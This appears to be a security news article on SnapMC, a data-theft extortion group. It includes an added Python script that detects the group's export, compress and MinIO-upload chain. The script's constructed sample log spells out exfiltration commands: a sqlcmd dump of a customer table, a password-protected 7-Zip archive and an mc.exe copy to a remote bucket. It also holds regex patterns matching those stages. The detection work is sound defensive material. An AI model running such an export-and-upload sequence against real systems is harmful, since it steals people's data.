A new threat actor tracked as SnapMC has emerged in the cybercrime space, carrying out the data-theft extortion that typically accompanies ransomware operations, but skipping the file encryption entirely.
File encryption is considered the core component of a ransomware attack, since it is the element that actually disrupts the victim's operations.
Data exfiltration for double extortion came later, as an additional form of leverage against a victim, but it always took a back seat to the chaos caused by an encrypted network.
Ransomware actors soon realized the power of this approach: many companies could recover damaged files from backups, but could not possibly reverse the theft of their data or its consequences.
Researchers at NCC Group have tracked a new adversary they call SnapMC, named after the speed of its attacks: the group breaks into a network, steals files, and delivers extortion emails in under 30 minutes.
Targeting known vulnerabilities
The SnapMC gang uses the Acunetix vulnerability scanner to find a range of flaws in a target's VPN and web server applications, then exploits them to break into the corporate network.
The most commonly exploited flaws observed in the actor's intrusions are a remote code execution vulnerability in Telerik UI for ASP.NET AJAX and various SQL injection bugs for initial access, with PrintNightmare used for local privilege escalation once inside.
The actors use SQL database export scripts to collect the data, and the resulting CSV files are compressed with the 7-Zip archiver before exfiltration. Once everything is packaged, the MinIO client is used to send the data to attacker-controlled storage.
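The export, compress, upload chain described above is short but leaves a distinctive trail in process-creation telemetry. The following detection logic is an added example, not code from NCC Group or from the original article: it looks, per host, for a MinIO client upload preceded within 30 minutes by both a 7-Zip archive creation and a bulk SQL export. The log lines are constructed for this example, and the `timestamp|host|user|image|command line` layout is an assumption; map your own EDR or Sysmon Event ID 1 fields into `ProcEvent` before use.

```python
"""Hunt for the SnapMC-style exfiltration chain (bulk SQL export, 7-Zip
compression, MinIO client upload) in process-creation telemetry.

Added example, not code from NCC Group or the original article. The log
lines below are constructed and the field layout
(timestamp|host|user|image|command line) is an assumption.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    host: str
    user: str
    image: str      # full path of the executable
    cmdline: str    # full command line


# Stage detectors: an image basename pattern plus a command-line pattern that
# separates a data export/upload from routine use of the same tool.
STAGES = {
    # Bulk export of query results to a file (sqlcmd -o, bcp queryout, dumps).
    "db_export": (re.compile(r"^(sqlcmd|bcp|mysqldump|pg_dump)(\.exe)?$", re.I),
                  re.compile(r"(\s-o\s|\bqueryout\b|mysqldump|pg_dump)", re.I)),
    # 7-Zip invoked with the 'a' (add to archive) command.
    "compress": (re.compile(r"^7za?(\.exe)?$", re.I),
                 re.compile(r"^\S+\s+a\s", re.I)),
    # MinIO client copying or mirroring to a remote alias (alias/bucket/...).
    "minio_upload": (re.compile(r"^mc(\.exe)?$", re.I),
                     re.compile(r"\b(cp|mirror|put)\b.+\s\S+/\S*", re.I)),
}


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1]


def classify(ev: ProcEvent):
    """Return the stage an event belongs to, or None if benign/unknown."""
    name = basename(ev.image)
    for stage, (img_re, cmd_re) in STAGES.items():
        if img_re.search(name) and cmd_re.search(ev.cmdline):
            return stage
    return None


def parse_log(text: str):
    """Parse constructed 'ts|host|user|image|cmdline' lines (assumed layout)."""
    events = []
    for line in text.strip().splitlines():
        ts, host, user, image, cmdline = line.split("|", 4)
        events.append(ProcEvent(datetime.fromisoformat(ts), host, user, image, cmdline))
    return events


def find_exfil_chains(events, window_minutes: int = 30):
    """Alert when a MinIO upload on a host is preceded, within the window,
    by both a 7-Zip archive creation and a bulk database export."""
    window = timedelta(minutes=window_minutes)
    by_host = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_host.setdefault(ev.host, []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        staged = [(classify(e), e) for e in evs]
        for stage, up in staged:
            if stage != "minio_upload":
                continue
            recent = [(s, e) for s, e in staged if s and up.ts - window <= e.ts <= up.ts]
            exports = [e for s, e in recent if s == "db_export"]
            archives = [e for s, e in recent if s == "compress"]
            if exports and archives:
                alerts.append({
                    "host": host,
                    "user": up.user,
                    "db_export": exports[0].ts,
                    "compress": archives[0].ts,
                    "minio_upload": up.ts,
                    "elapsed_s": int((up.ts - exports[0].ts).total_seconds()),
                })
    return alerts


# Constructed sample telemetry (not real logs): one malicious chain on
# srv-db01 plus benign look-alikes (a routine backup, an 'mc ls').
SAMPLE_LOG = r"""
2021-10-12T10:01:05|srv-web01|IIS APPPOOL\DefaultAppPool|C:\Windows\System32\inetsrv\w3wp.exe|w3wp.exe -ap "DefaultAppPool"
2021-10-12T10:03:11|srv-db01|CORP\svc_sql|C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\sqlcmd.exe|sqlcmd -S . -d Customers -Q "SELECT * FROM dbo.Customers" -s "," -o C:\Windows\Temp\customers.csv
2021-10-12T10:05:40|srv-db01|CORP\svc_sql|C:\Windows\Temp\7z.exe|7z.exe a -p C:\Windows\Temp\export.7z C:\Windows\Temp\*.csv
2021-10-12T10:09:02|srv-db01|CORP\svc_sql|C:\Windows\Temp\mc.exe|mc.exe cp C:\Windows\Temp\export.7z ext/dropbucket/export.7z
2021-10-12T11:30:00|srv-fs02|CORP\backup|C:\Program Files\7-Zip\7z.exe|7z.exe a D:\Backups\weekly.7z D:\Shares
2021-10-12T16:00:00|srv-db01|CORP\dba|C:\Tools\mc.exe|mc.exe ls ext/
"""

if __name__ == "__main__":
    for alert in find_exfil_chains(parse_log(SAMPLE_LOG)):
        print(alert)
```

The three-stage correlation keeps the false-positive rate down: a nightly 7-Zip backup job or an administrator listing buckets with `mc ls` matches one stage at most and never alerts, while the full chain on one host inside half an hour is exactly the tempo the article describes. Tune the window and add your own export tools (for example `Invoke-Sqlcmd` or custom scripts) to the `db_export` patterns.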
Given that SnapMC exploits known vulnerabilities for which patches are already available, keeping software up to date is the most effective defense against this growing threat.
As NCC Group points out in its report, exploitation attempts against a vulnerable Telerik version still fail when the underlying .NET Framework is up to date, so patching the platform matters as much as patching the vulnerable component itself.
It is risky to pay
In data exfiltration extortion attacks, meeting the threat actor's demands by paying the ransom guarantees nothing. On the contrary, it can give the attackers an incentive to attempt further blackmail in the future.
It is also possible that, even if a victim pays, their data ends up being sold on criminal marketplaces or hacker forums as an additional revenue stream for the attackers.
Ransomware negotiation firm Coveware strongly advises its clients never to pay a ransom to prevent stolen files from being leaked publicly.
In past negotiation cases, victims have paid a ransom and their data was still leaked, or proof of deletion was never provided:
- Sodinokibi: Victims who paid were extorted again weeks later with threats to post the same dataset.
- Netwalker: Data was posted from companies that had paid for it not to be leaked.
- Mespinoza: Data was posted from companies that had paid for it not to be leaked.
- Conti: Fake files were shown as proof of deletion.
Because of this, victims should assume that their data has already been shared with other threat actors and will be used or leaked in the future, regardless of whether they pay a ransom.